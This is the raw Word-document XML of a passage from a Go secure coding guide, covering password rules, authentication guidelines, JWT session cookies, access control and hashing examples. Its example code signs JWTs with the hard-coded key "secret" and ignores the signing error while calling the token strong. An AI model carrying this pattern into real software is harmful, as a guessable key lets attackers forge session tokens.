        <w:t>eight characters is commonly used, but 16 is better or consider the use of multi-word pass phrases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Of course, none of the previous guidelines will prevent users from re-using the same password. The best you can do to reduce this bad practice is to "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>enforce password changes</w:t>
      </w:r>
      <w:r>
        <w:t>", and preventing password re-use. "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Critical systems may require more frequent changes. The time between resets must be administratively controlled</w:t>
      </w:r>
      <w:r>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="40" w:name="Reset"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Reset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>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1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>Passwords should be at least one day old before they can be changed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>". This way you'll prevent attacks on password re-use. Whenever using "</w:t>
      </w:r>
      <w:r>
        <w:t>email based resets, only send email to a pre-registered address with a temporary link/password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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0"/>
        </w:rPr>
        <w:t>Password reset questions should support sufficiently random answers</w:t>
      </w:r>
      <w:r>
        <w:t>": asking for "Favorite Book?" may lead to "The Bible" which makes this reset questions undesirable in most cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="41" w:name="Other_guidelines"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Other guidelines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication is a critical part of any system, therefore you should always employ correct and safe practices. Below are some guidelines to make your authentication system more resilient:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>Re-authenticate users prior to performing critical operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>Use Multi-Factor Authentication for highly sensitive or high value transactional accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>Implement monitoring to identify attacks against multiple user accounts, utilizing the same password. This attack pattern is used to bypass standard lockouts, when user IDs can be harvested or guessed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>Change all vendor-supplied default passwords and user IDs or disable the associated accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="42" w:name="Session_Management"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Session Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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6885432" cy="1563624"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="SessionManagementOverview" id="7" name="SessionManagementOverview.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="SessionManagementOverview" id="0" name="SessionManagementOverview.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6885432" cy="1563624"/>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5"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// create a JWT and put in the clients cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> setToken(res http.ResponseWriter, req *http.Request) {
  ...
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>We must ensure that the algorithms used to generate our session identifier are sufficiently random, to prevent session brute forcing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">...
token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
signedToken, _ := token.SignedString([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"secret"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//our secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
...
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that we have a sufficiently strong token, we must also set the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Expires</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>HTTP only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for our cookies. In this case the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Expires</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value is in this example set to 30 minutes since we are considering our application a low-risk application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// Our cookie parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
cookie := http.Cookie{
    Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Auth"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">,
    Value: signedToken,
    Expires: expireCookie,
    HttpOnly: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">,
    Path: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">,
    Domain: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">,
    Secure: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
http.SetCookie(res, &amp;cookie) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//Set the cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upon sign-in, a new session is always generated. The old session is never re-used, even if it is not expired. We also use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">err := http.ListenAndServeTLS(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":443"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"cert/cert.pem"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"cert/key.pem"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {
  log.Fatal(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"ListenAndServe: "</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, err)
}
</w:t>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05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">...
cookie, err := req.Cookie(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Auth"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//Our auth token</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res.Header().Set(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"text/html"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
  fmt.Fprint(res, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Unauthorized - Please login &lt;br&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
  fmt.Fprintf(res, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;a href=\"login\"&gt; Login &lt;/a&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
...
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The full example can be found in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text1"/>
        </w:rPr>
        <w:t>session.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="43" w:name="Access_Control"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Access Control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When dealing with access controls the first step to take is to use only trusted system objects for access authorization decisions. In the example provided in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index4_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Session Management</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section, we implemented this using JWT: JSON Web Tokens to generate a session token on the server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// create a JWT and put in the clients cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> setToken(res http.ResponseWriter, req *http.Request) {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//30m Expiration for non-sensitive applications - OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    expireToken := time.Now().Add(time.Minute * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">).Unix()
    expireCookie := time.Now().Add(time.Minute * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//token Claims</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    claims := Claims{
        {...}
    }
    token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
    signedToken, _ := token.SignedString([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"secret"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can then store and use this token to validate the user and enforce our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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2"/>
        </w:rPr>
        <w:t>Defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to achieve this. There are more details in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_error_handling_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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33"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>File and other resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Protected URL's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Protected functions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Direct object references</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Application data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>User and data attributes and policy information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the provided example, a simple direct object reference is tested. This code is built upon the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text1"/>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0"/>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2"/>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0"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> external systems, these accounts must use the lowest level privilege possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="44" w:name="Cryptographic_Practices"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Cryptographic Practices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>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4"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hash := F(data)
</w:t>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_a_weakness_on_th___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="45" w:name="1"/>
          <w:t>1</w:t>
          <w:bookmarkEnd w:id="45"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. MD5 is the most popular hashing algorithm, but securitywise </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>BLAKE2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is considered the strongest and most flexible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go supplementary cryptography libraries offers both </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>BLAKE2b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (or just BLAKE2) and </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>BLAKE2s</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> implementations: the former is optimized for 64-bit platforms and the latter for 8-bit to 32-bit platforms. If BLAKE2 is unavailable, SHA-256 is the right option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Whenever you have something that you don't need to know what it is, but only if it's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>what it's supposed to be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (like checking file integrity after download), you should use hashing</w:t>
      </w:r>
      <w:hyperlink w:anchor="2__Consider_reading_the_Authentication_and_Passwo___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="46" w:name="2"/>
          <w:t>2</w:t>
          <w:bookmarkEnd w:id="46"/>
        </w:r>
      </w:hyperlink>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"io"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"crypto/md5"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"crypto/sha256"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"golang.org/x/crypto/blake2s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main () {
        h_md5 := md5.New()
        h_sha := sha256.New()
        h_blake2s, _ := blake2s.New256(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        io.WriteString(h_md5, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Welcome to Go Language Secure Coding Practices"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        io.WriteString(h_sha, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Welcome to Go Language Secure Coding Practices"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
